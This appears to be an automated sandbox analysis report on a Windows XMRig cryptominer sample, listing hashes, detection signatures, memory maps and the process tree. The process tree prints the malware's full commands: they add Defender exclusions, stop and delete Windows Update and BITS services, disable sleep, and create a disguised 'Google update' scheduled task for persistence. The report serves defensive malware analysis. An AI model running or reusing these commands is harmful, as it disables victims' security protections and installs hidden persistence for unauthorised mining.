Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
28-09-2022 23:58
General
-
Target
11.exe
-
Size
7.2MB
-
MD5
6ea25d773cf0786cb3fb31483a1bc5dc
-
SHA1
7366c623557f4e6bd6286e5b860155ccba161e29
-
SHA256
9b3ffda6ae9f7822e6984568c4ea924a3f651f0b1afcfccf8413631015abb507
-
SHA512
83c8ebe2681448129f084c849df44cb30b71483cf75469ccc80c59aacf213ba153dd91f4431336faf634dab2196f8ed46c6a74a5ec4c2a1201bc84f718818817
-
SSDEEP
196608:YGo4HILZq86dKzZicbAyIcq54eT5Ukko6m:14uAzZicbybT5Uho6m
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
-
XMRig Miner payload 2 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 1 IoCs
-
Stops running service(s) 3 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 1 IoCs
-
Themida packer 20 IoCs
Detects Themida, an advanced Windows software protection system.
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Drops file in System32 directory 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 38 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#uzgegy#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#dudxt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {9685EBEC-032D-470F-926B-56C7AA1F31AB} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#uzgegy#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe tdkzljpehmtshjo3⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"4⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor5⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
- Drops file in Program Files directory
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe liapudzdhfhganis GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1py/9uBWaVrEYk1NIc0Qezccu6d/kJPxD2LV5bbHMWxB3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.2MB
MD5308507d6d4325d05f12d738b77156844
SHA1e19ccc9ffb93f06102e027a670160867d1839e23
SHA25621f395dcf62282b1d6bbd19d352af771979441a76c319f12a77f3c56537cb2b5
SHA5128c44b1cc1438bc087595f1e0889b2e098d387206006fef37fa7cbea8fd8c12334503481056c277fc0f2cf3a84f2d6156a1166bdf5a333f3da0e085f5d534db57
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.2MB
MD5308507d6d4325d05f12d738b77156844
SHA1e19ccc9ffb93f06102e027a670160867d1839e23
SHA25621f395dcf62282b1d6bbd19d352af771979441a76c319f12a77f3c56537cb2b5
SHA5128c44b1cc1438bc087595f1e0889b2e098d387206006fef37fa7cbea8fd8c12334503481056c277fc0f2cf3a84f2d6156a1166bdf5a333f3da0e085f5d534db57
-
C:\Program Files\Google\Libs\g.logFilesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD50d4e0e85319c808c1c1a1a81b3ae96ac
SHA18b996eb5ef47887407b7dcb122a08e76f0aa8e28
SHA256f1eea9438dc6308ef909efc26f54913a38296d817b4c92c7eaace99832f31bbd
SHA51268ffbf744f959e3c9e620d6f524ecfc71bbb83ded466938432fbe2a801bdef6b1784b6823f8b425c34c45f7677596a95ef5554b9e5036aa30bbd62ae6f3dfb48
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD50d4e0e85319c808c1c1a1a81b3ae96ac
SHA18b996eb5ef47887407b7dcb122a08e76f0aa8e28
SHA256f1eea9438dc6308ef909efc26f54913a38296d817b4c92c7eaace99832f31bbd
SHA51268ffbf744f959e3c9e620d6f524ecfc71bbb83ded466938432fbe2a801bdef6b1784b6823f8b425c34c45f7677596a95ef5554b9e5036aa30bbd62ae6f3dfb48
-
C:\Windows\system32\drivers\etc\hostsFilesize
2KB
MD51a83e338f634e641c4da1e946cd19c7e
SHA1030166ba670530c9191ba0be6c2e9fe84d1b3cc4
SHA256ef520c8d1fce85b1fda1261b5423b62521868fe0220920ca2ae8d26e20d9a44d
SHA5127f548d086197dc07d2998318be59e1d8a678593db0ae741a5b50548f98d4e851edeff975e80ca3f4af4cdafad4b7661b490fe50dddee8d9219d8442a2f7c9169
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Program Files\Google\Chrome\updater.exeFilesize
7.2MB
MD5308507d6d4325d05f12d738b77156844
SHA1e19ccc9ffb93f06102e027a670160867d1839e23
SHA25621f395dcf62282b1d6bbd19d352af771979441a76c319f12a77f3c56537cb2b5
SHA5128c44b1cc1438bc087595f1e0889b2e098d387206006fef37fa7cbea8fd8c12334503481056c277fc0f2cf3a84f2d6156a1166bdf5a333f3da0e085f5d534db57
-
memory/364-89-0x0000000000000000-mapping.dmp
-
memory/428-141-0x0000000000000000-mapping.dmp
-
memory/536-149-0x0000000000000000-mapping.dmp
-
memory/560-128-0x0000000000000000-mapping.dmp
-
memory/624-144-0x0000000000000000-mapping.dmp
-
memory/624-91-0x0000000000000000-mapping.dmp
-
memory/632-75-0x0000000000000000-mapping.dmp
-
memory/664-145-0x0000000000000000-mapping.dmp
-
memory/668-92-0x0000000000000000-mapping.dmp
-
memory/764-85-0x0000000000000000-mapping.dmp
-
memory/856-132-0x0000000000000000-mapping.dmp
-
memory/876-136-0x0000000000000000-mapping.dmp
-
memory/912-76-0x0000000000000000-mapping.dmp
-
memory/928-151-0x0000000000000000-mapping.dmp
-
memory/940-107-0x0000000000000000-mapping.dmp
-
memory/964-77-0x0000000000000000-mapping.dmp
-
memory/988-140-0x0000000000000000-mapping.dmp
-
memory/1008-79-0x0000000000000000-mapping.dmp
-
memory/1076-81-0x0000000000000000-mapping.dmp
-
memory/1220-158-0x0000000000000000-mapping.dmp
-
memory/1232-84-0x00000000025E4000-0x00000000025E7000-memory.dmpFilesize
12KB
-
memory/1232-96-0x00000000025EB000-0x000000000260A000-memory.dmpFilesize
124KB
-
memory/1232-83-0x000007FEF3D30000-0x000007FEF488D000-memory.dmpFilesize
11.4MB
-
memory/1232-80-0x000007FEF4890000-0x000007FEF52B3000-memory.dmpFilesize
10.1MB
-
memory/1232-95-0x00000000025E4000-0x00000000025E7000-memory.dmpFilesize
12KB
-
memory/1232-73-0x0000000000000000-mapping.dmp
-
memory/1232-90-0x00000000025EB000-0x000000000260A000-memory.dmpFilesize
124KB
-
memory/1400-94-0x0000000000000000-mapping.dmp
-
memory/1484-148-0x0000000000000000-mapping.dmp
-
memory/1496-146-0x0000000000000000-mapping.dmp
-
memory/1524-155-0x00000001400014E0-mapping.dmp
-
memory/1524-72-0x0000000000000000-mapping.dmp
-
memory/1556-93-0x0000000000000000-mapping.dmp
-
memory/1560-129-0x0000000000000000-mapping.dmp
-
memory/1616-160-0x00000001407F25D0-mapping.dmp
-
memory/1616-163-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1616-164-0x0000000000220000-0x0000000000240000-memory.dmpFilesize
128KB
-
memory/1616-167-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1624-105-0x00000000023E4000-0x00000000023E7000-memory.dmpFilesize
12KB
-
memory/1624-109-0x00000000023EB000-0x000000000240A000-memory.dmpFilesize
124KB
-
memory/1624-104-0x000007FEF2CC0000-0x000007FEF381D000-memory.dmpFilesize
11.4MB
-
memory/1624-97-0x0000000000000000-mapping.dmp
-
memory/1624-106-0x000000001B770000-0x000000001BA6F000-memory.dmpFilesize
3.0MB
-
memory/1624-103-0x000007FEF3EF0000-0x000007FEF4913000-memory.dmpFilesize
10.1MB
-
memory/1624-108-0x00000000023E4000-0x00000000023E7000-memory.dmpFilesize
12KB
-
memory/1656-65-0x000007FEFC251000-0x000007FEFC253000-memory.dmpFilesize
8KB
-
memory/1656-69-0x00000000024F4000-0x00000000024F7000-memory.dmpFilesize
12KB
-
memory/1656-67-0x000007FEF2CC0000-0x000007FEF381D000-memory.dmpFilesize
11.4MB
-
memory/1656-68-0x00000000024F4000-0x00000000024F7000-memory.dmpFilesize
12KB
-
memory/1656-70-0x00000000024FB000-0x000000000251A000-memory.dmpFilesize
124KB
-
memory/1656-64-0x0000000000000000-mapping.dmp
-
memory/1656-66-0x000007FEF3EF0000-0x000007FEF4913000-memory.dmpFilesize
10.1MB
-
memory/1700-147-0x0000000000000000-mapping.dmp
-
memory/1732-82-0x0000000000000000-mapping.dmp
-
memory/1740-86-0x0000000000000000-mapping.dmp
-
memory/1760-113-0x000000013FBC0000-0x00000001408CB000-memory.dmpFilesize
13.0MB
-
memory/1760-142-0x000000013FBC0000-0x00000001408CB000-memory.dmpFilesize
13.0MB
-
memory/1788-121-0x0000000000000000-mapping.dmp
-
memory/1788-123-0x000007FEF4890000-0x000007FEF52B3000-memory.dmpFilesize
10.1MB
-
memory/1788-124-0x000007FEF3D30000-0x000007FEF488D000-memory.dmpFilesize
11.4MB
-
memory/1788-125-0x0000000000E64000-0x0000000000E67000-memory.dmpFilesize
12KB
-
memory/1788-126-0x0000000000E64000-0x0000000000E67000-memory.dmpFilesize
12KB
-
memory/1788-127-0x0000000000E6B000-0x0000000000E8A000-memory.dmpFilesize
124KB
-
memory/1804-159-0x0000000000000000-mapping.dmp
-
memory/1812-134-0x0000000000000000-mapping.dmp
-
memory/1824-131-0x0000000000000000-mapping.dmp
-
memory/1824-153-0x000000000123B000-0x000000000125A000-memory.dmpFilesize
124KB
-
memory/1824-152-0x0000000001234000-0x0000000001237000-memory.dmpFilesize
12KB
-
memory/1824-137-0x000007FEF3EF0000-0x000007FEF4913000-memory.dmpFilesize
10.1MB
-
memory/1824-143-0x0000000001234000-0x0000000001237000-memory.dmpFilesize
12KB
-
memory/1824-139-0x000007FEF2CC0000-0x000007FEF381D000-memory.dmpFilesize
11.4MB
-
memory/1876-150-0x0000000000000000-mapping.dmp
-
memory/1928-88-0x0000000000000000-mapping.dmp
-
memory/1940-138-0x0000000000000000-mapping.dmp
-
memory/1940-87-0x0000000000000000-mapping.dmp
-
memory/1960-135-0x0000000000000000-mapping.dmp
-
memory/1964-116-0x000000013FBC0000-0x00000001408CB000-memory.dmpFilesize
13.0MB
-
memory/1964-156-0x00000000779D0000-0x0000000077B79000-memory.dmpFilesize
1.7MB
-
memory/1964-111-0x0000000000000000-mapping.dmp
-
memory/1964-114-0x000000013FBC0000-0x00000001408CB000-memory.dmpFilesize
13.0MB
-
memory/1964-162-0x000000013FBC0000-0x00000001408CB000-memory.dmpFilesize
13.0MB
-
memory/1964-161-0x00000000779D0000-0x0000000077B79000-memory.dmpFilesize
1.7MB
-
memory/1964-115-0x000000013FBC0000-0x00000001408CB000-memory.dmpFilesize
13.0MB
-
memory/1964-120-0x00000000779D0000-0x0000000077B79000-memory.dmpFilesize
1.7MB
-
memory/1964-118-0x000000013FBC0000-0x00000001408CB000-memory.dmpFilesize
13.0MB
-
memory/1964-119-0x000000013FBC0000-0x00000001408CB000-memory.dmpFilesize
13.0MB
-
memory/1964-117-0x000000013FBC0000-0x00000001408CB000-memory.dmpFilesize
13.0MB
-
memory/1964-154-0x000000013FBC0000-0x00000001408CB000-memory.dmpFilesize
13.0MB
-
memory/2020-71-0x0000000000000000-mapping.dmp
-
memory/2024-59-0x000000013FC30000-0x000000014093B000-memory.dmpFilesize
13.0MB
-
memory/2024-54-0x000000013FC30000-0x000000014093B000-memory.dmpFilesize
13.0MB
-
memory/2024-57-0x000000013FC30000-0x000000014093B000-memory.dmpFilesize
13.0MB
-
memory/2024-157-0x0000000000000000-mapping.dmp
-
memory/2024-58-0x00000000779D0000-0x0000000077B79000-memory.dmpFilesize
1.7MB
-
memory/2024-61-0x000000013FC30000-0x000000014093B000-memory.dmpFilesize
13.0MB
-
memory/2024-101-0x00000000779D0000-0x0000000077B79000-memory.dmpFilesize
1.7MB
-
memory/2024-63-0x00000000779D0000-0x0000000077B79000-memory.dmpFilesize
1.7MB
-
memory/2024-99-0x000000013FC30000-0x000000014093B000-memory.dmpFilesize
13.0MB
-
memory/2024-60-0x000000013FC30000-0x000000014093B000-memory.dmpFilesize
13.0MB
-
memory/2024-55-0x000000013FC30000-0x000000014093B000-memory.dmpFilesize
13.0MB
-
memory/2024-56-0x000000013FC30000-0x000000014093B000-memory.dmpFilesize
13.0MB
-
memory/2024-62-0x000000013FC30000-0x000000014093B000-memory.dmpFilesize
13.0MB